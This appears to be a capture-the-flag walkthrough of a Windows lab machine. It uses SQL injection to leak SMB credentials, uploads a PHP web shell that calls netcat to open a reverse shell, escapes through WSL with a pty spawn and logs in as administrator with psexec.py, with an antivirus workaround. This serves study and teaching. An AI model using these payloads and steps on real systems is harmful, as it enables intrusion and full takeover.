

After the nmap scan, we see the web server is a login page:

I try and create an account and log in->

We get access to a dashboard and a possible username

let's try unlogging and abuse this web app with SQLis

when we connect with the credentials it fills in an error, good news

We try with some more SQLi patterns and end up having database infos leaked within the dashboard :

We find what seems to be credentials for an SMB share?

Other than the manual exploitation we could use psexec:

psexec.py tyler:'92g!mA8BGjOirkL%OG*&'@

It did not work :

So let's go manually with passwd 92g!mA8BGjOirkL%OG*&

smbclient \\\\\\new-site -U tyler

now create a file called 'shell.php'

<?php system('nc.exe -e cmd.exe 9898') ?>

and then copy on your root directory netcat:

locate nc.exe
cp /usr/share/sqlninja/apps/nc.exe nc.exe

and on the smb share of tyler:

put shell.php
put nc.exe

Using the put command to upload a reverse shell and your netcat executable to an SMB share on the target system, you're creating a foothold on the target system. Even if your initial access is lost, you can regain access through the uploaded tools and i'll be able to call netcat and so trigger my reverse shell to obtain a shell ->

So now i need to trigger my shell.php file, after some looking around i found where were stored the files:

So i simply request:

and get a shell:

and go and grab the flag:

For the elevation let's dive into subsystems:

first we saw that we needed to locate bash.exe, you can use a recursive search this way:

where /R c:\windows bash.exe

same for wsl.exe:

where /R c:\windows wsl.exe

quick explanation on why we're doing this:

after trying to get a bash shell by triggering bash.exe, we get some useful infos:

We are root but on a linux machine of secnotes, so not really what we are looking for

we are in a non tty, let's try to escape

for reminder, a non tty refers to a type of device or terminal that does not have interactive capabilities like a traditional teletypewriter or terminal.

Let's try to get a shell via a python import:

python -c "import pty;pty.spawn('/bin/bash')"
  • python: This invokes the Python interpreter.

  • -c: This option allows you to pass a command directly to Python for execution.

  • "import pty; pty.spawn('/bin/bash')": This is the Python code that gets executed.

    • import pty: This imports the pty module, which provides functions for controlling pseudo-terminals.

    • pty.spawn('/bin/bash'): This line spawns a new interactive shell (/bin/bash). When this line is executed, it effectively starts a new shell session within the current terminal session. The pty.spawn() function creates a new pseudo-terminal and executes the specified command (/bin/bash) within it. This results in a fully interactive shell prompt, allowing the user to execute commands and interact with the system as if they were using a normal terminal.

now let's look what we have in the root folder:

after looking through stuff we encounter:

that's a quick and easy win, let's try some other stuff

Impacket Toolkit - https://github.com/SecureAuthCorp/impacket

first, let's install impacket

psexec.py administrator:'u6!4ZwgwOM#^OBf#Nwnh'@
  • psexec.py: This likely refers to a Python script named psexec.py. This script is likely designed to replicate the functionality of the original PsExec tool developed by Sysinternals, which allows for the execution of commands on remote Windows systems.

  • administrator:'u6!4ZwgwOM#^OBf#Nwnh': This part of the command specifies the username and password to authenticate to the target system. In this case, the username is administrator and the password appears to be 'u6!4ZwgwOM#^OBf#Nwnh'. The password is enclosed in single quotes to ensure that special characters within it are properly interpreted.

  • @ This specifies the IP address or hostname of the target Windows system. The psexec.py script will attempt to connect to this system using the provided credentials and execute commands remotely.

And just go and fetch the file

If A/V is blocking psexec, you can use smbexec or winexe

Last updated